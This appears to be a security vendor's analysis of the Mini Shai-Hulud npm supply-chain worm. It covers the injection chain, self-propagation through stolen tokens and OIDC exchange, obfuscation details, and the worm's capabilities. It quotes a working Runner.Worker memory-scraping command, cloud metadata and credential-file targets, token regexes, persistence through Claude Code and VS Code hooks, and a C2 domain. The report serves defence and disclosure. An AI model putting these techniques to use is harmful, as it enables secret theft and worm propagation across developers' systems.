The TeamPCP threat group executed a sophisticated supply chain attack using a new variant of their self-propagating worm, Mini Shai-Hulud, compromising numerous npm packages, most notably those from TanStack, UiPath, and DraftLab, collectively downloaded millions of times weekly. This incident, detected by StepSecurity AI Package Analyst, involved the publication of malicious package versions through legitimate GitHub Actions release pipelines using hijacked OIDC tokens, making them the first documented npm worm to produce validly-attested malicious packages with SLSA Build Level 3 provenance.

The core methodology involved a three-step chain:

1. Staging the Payload: The attacker created a fork of a legitimate repository (e.g., TanStack/router) and committed a malicious payload. This payload included a package.json for a fake package (e.g., @tanstack/setup) defining a prepare lifecycle hook to execute an obfuscated JavaScript file (tanstack_runner.js) upon installation via a GitHub URL. The && exit 1 in the prepare script was used to ensure graceful failure, minimizing logs while the payload executed. The GitHub URL itself was crafted to appear legitimate, referencing the original repository but pointing to the attacker's fork commit (e.g., github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c).
2. Injecting the Payload: The attacker tampered with published tarballs of legitimate packages. This involved two key modifications:
   • Adding a new optionalDependencies field to the package.json of each compromised package, pointing to the staged malicious payload in the attacker's fork (e.g., "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c").
   • Placing an additional malicious file (e.g., router_init.js) at the package root, which was intentionally not listed in the files field of package.json, indicating direct tarball tampering. This file was significantly larger and obfuscated compared to clean versions.
3. Publishing via Legitimate CI/CD: The malicious code exploited the compromised project's ambient GitHub Actions OIDC token (with id-token: write permission) to publish the tampered packages directly to npm. This bypassed the workflow's normal publish steps, allowing the attacker to push the malicious versions while the legitimate build process might have failed or skipped publishing. Critically, because the publishing was done through the project's own CI/CD, the packages received valid SLSA provenance attestations, indicating that while the build environment was trusted, the process itself was compromised.

The Mini Shai-Hulud worm operates as a true self-propagating entity. After compromising an environment and stealing credentials, it automates its spread by:

4. Finding Publishable Tokens: It queries https://registry.npmjs.org/-/npm/v1/tokens to locate an npm token with bypass_2fa set to true, allowing publication without multi-factor authentication.
5. Enumerating Target Packages: It queries the npm registry via https://registry.npmjs.org/-/v1/search?text=maintainer:<username>&size=250 to discover all packages associated with the stolen maintainer credentials.
6. OIDC Token Exchange for Publishing: In CI/CD environments, it leverages the GitHub OIDC token (process.env.ACTIONS_ID_TOKEN) to exchange it for a per-package npm publish token via $https://registry.npmjs.org/-/npm/v1/oidc/token/exchange/package/<pkg>$, enabling direct publication of infected tarballs for each identified target package.

The primary malicious payload, router_init.js, is a 2.3 MB single-line JavaScript file, protected by three layers of obfuscation:

7. Obfuscator.io String Table: A standard technique using shuffled base64-encoded strings and a resolver function (e.g., _0x253b(hex_index - 0x15a)), with an IIFE-based array rotation at startup.
8. Secondary Cipher (beautify()): A per-byte Fisher-Yates substitution cipher using SHA-256 stream RNG. The master key for this layer is derived via PBKDF2-SHA256 (salt: svksjrhjkcejg, 200,000 iterations). This layer decrypts sensitive strings like C2 domains, credential file paths, and environment variables.
9. AES-256-GCM Encrypted Payloads (w8()): Eleven secondary payloads are encrypted using AES-256-GCM. Their per-payload keys are recovered by applying the beautify() function to a key ciphertext. After decryption, these payloads are gzip-compressed and require the Bun runtime (Bun.gunzipSync). The w8() function can be reconstructed as:

Once deobfuscated, the worm's capabilities include:

• Runner.Worker Memory Scraping: A Python script (Payload 5) directly reads the memory of the GitHub Actions Runner.Worker process via /proc/{pid}/mem on Linux. It targets and extracts JSON objects matching {"value":"...","isSecret":true}—the internal representation of masked secrets—thus obtaining all secrets configured for the workflow, regardless of explicit referencing. This is executed via sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}' | sort -u.
• Cloud Credential Theft: It actively queries cloud metadata services (e.g., AWS IMDSv2 using http://169.254.169.254/latest/api/token and subsequent role/credential fetches, or ECS container credentials from 169.254.170.2). It also collects HashiCorp Vault credentials from local agents (127.0.0.1:8200) and uses regex patterns (e.g., /npm_[A-Za-z0-9]{36,}/g, /gh[op]_[A-Za-z0-9]{36}/g, /hvs\.[A-Za-z0-9_-]{24,}/g) to identify various token types.
• Credential File Harvest: Reads from over 100 hardcoded paths on the victim's system, spanning cloud provider configs (~/.aws/credentials), SSH keys (~/.ssh/id_rsa), developer tool configs (.npmrc, .docker/config.json), AI tools (.claude.json), cryptocurrency wallets, VPN configs, messaging app data, and shell history files.
• Persistence: Installs multiple persistence mechanisms to survive reboots and re-execute:
  • IDE Hooks: Writes settings.json for Claude Code (.claude/settings.json) to execute on session start and tasks.json for VS Code (.vscode/tasks.json) to trigger on folder open.
  • OS-Level Service: Installs a gh-token-monitor service (Payload 1) via platform-specific service managers (e.g., launchctl on macOS, systemd --user on Linux) to continuously exfiltrate GitHub tokens.
• GitHub Actions Workflow Injection: Writes malicious GitHub Actions workflows disguised as legitimate ones (e.g., .github/workflows/codeql_analysis.yml). These workflows utilize toJSON(secrets) to serialize all repository secrets and either directly POST them to a C2 server (e.g., api.masscan.cloud) or upload them as workflow artifacts for later retrieval.

Stolen data is encrypted and exfiltrated through the Session Protocol CDN and GitHub's own GraphQL API, with dead-drop commits authored as claude@users.noreply.github.com and disguised with Dependabot-style branch names. Users who installed compromised versions are advised to assume all secrets accessible in that environment are compromised.